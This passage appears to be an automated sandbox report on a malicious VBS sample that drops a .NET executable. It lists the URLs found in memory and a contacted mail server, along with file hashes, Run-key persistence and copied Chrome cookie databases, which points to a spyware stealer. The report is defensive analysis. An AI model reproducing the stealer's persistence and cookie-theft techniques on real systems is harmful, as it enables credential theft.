http://www.fontbureau.com | anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmp | false | none | high
http://www.galapagosdesign.com/ | anyname.exe, 00000001.00000003.308329187.000000000537D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://DynDns.comDynDNS | jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comF | anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comcomd | anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/N | anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://mail.gnvmetalica.pe | anyname.exe, 00000006.00000002.825426440.0000000003138000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.825518834.000000000315A000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.826045034.0000000003461000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.commom | anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                                              http://www.fontbureau.comdcanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.coma=anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fontbureau.com/designers/cabarga.htmleanyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.jiyu-kobo.co.jp/jp/anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comdanyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.carterandcone.comlanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.coma2anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://pZXqS7KWMFA4rh4s.net$jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.founder.com.cn/cnanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/uanyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlanyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/Y0/anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cn9anyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comldanyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comoanyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/%7anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/janyname.exe, 00000001.00000003.305479835.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305305998.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305379502.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comalicanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comgrita=anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.fontbureau.comitudanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comFjanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown

                                                        Contacted IPs

                                                        Public

                                                         IP               Domain               Country        ASN    ASN Name             Malicious
                                                         162.241.148.206  mail.gnvmetalica.pe  United States  46606  UNIFIEDLAYER-AS-1US  false

                                                        General Information

                                                         Joe Sandbox Version: 34.0.0 Boulder Opal
                                                         Analysis ID: 546894
                                                         Start date: 01.01.2022
                                                         Start time: 09:09:08
                                                         Joe Sandbox Product: CloudBasic
                                                         Overall analysis duration: 0h 15m 52s
                                                         Hypervisor based Inspection enabled: false
                                                         Report type: full
                                                         Sample file name: TGFTR.vbs
                                                         Cookbook file name: default.jbs
                                                         Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                         Number of new started processes analysed: 27
                                                         Number of new started drivers analysed: 0
                                                         Number of existing processes analysed: 0
                                                         Number of existing drivers analysed: 0
                                                         Number of injected processes analysed: 0
                                                         Technologies:
                                                         • HCA enabled
                                                         • EGA enabled
                                                         • HDC enabled
                                                         • AMSI enabled
                                                         Analysis Mode: default
                                                         Analysis stop reason: Timeout
                                                         Detection: MAL
                                                         Classification: mal100.troj.spyw.evad.winVBS@17/7@4/1
                                                         EGA Information: Failed
                                                         HDC Information: Failed
                                                         HCA Information:
                                                         • Successful, ratio: 92%
                                                         • Number of executed functions: 76
                                                         • Number of non-executed functions: 2
                                                         Cookbook Comments:
                                                         • Adjust boot time
                                                         • Enable AMSI
                                                         • Found application associated with file extension: .vbs
                                                         • Override analysis time to 240s for JS/VBS files not yet terminated
                                                         Warnings:
                                                         • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                         • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                         • Not all processes where analyzed, report is missing behavior information
                                                         • Report creation exceeded maximum time and may have missing disassembly code information.
                                                         • Report size exceeded maximum capacity and may have missing behavior information.
                                                         • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                         • Report size getting too big, too many NtOpenKeyEx calls found.
                                                         • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                         • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                         Time      Type             Description
                                                         09:10:16  API Interceptor  1466x Sleep call for process: anyname.exe modified
                                                         09:10:46  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                         09:10:54  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                         09:10:58  API Interceptor  1134x Sleep call for process: jNnIJrO.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASN

                                                        No context

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\anyname.exe.log
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.355304211458859
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jNnIJrO.exe.log
                                                        Process:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.355304211458859
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                        C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........V...Z...............U...........................................0...........(...."...@s....}.....(...."...@s....}.....(....s....}.....(....s....}.....(....s....}.....s....}.....s....}......}.....(........}......}......}.....(.....*.0..S.........s....}.....{...........s....o......{...........s....o......{.....o........(.....*...{.....o......{.....o......{....o......{.....o ....*..*&...}....*:..{....oa....*....0..,.........{.........,...{....o!......{.........,...*.0..
                                                        C:\Users\user\AppData\Roaming\11x25noc.qgj\Chrome\Default\Cookies
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.6970840431455908
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........V...Z...............U...........................................0...........(...."...@s....}.....(...."...@s....}.....(....s....}.....(....s....}.....(....s....}.....s....}.....s....}......}.....(........}......}......}.....(.....*.0..S.........s....}.....{...........s....o......{...........s....o......{.....o........(.....*...{.....o......{.....o......{....o......{.....o ....*..*&...}....*:..{....oa....*....0..,.........{.........,...{....o!......{.........,...*.0..
                                                        C:\Users\user\AppData\Roaming\mp0cbpec.t0r\Chrome\Default\Cookies
                                                        Process:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.6970840431455908
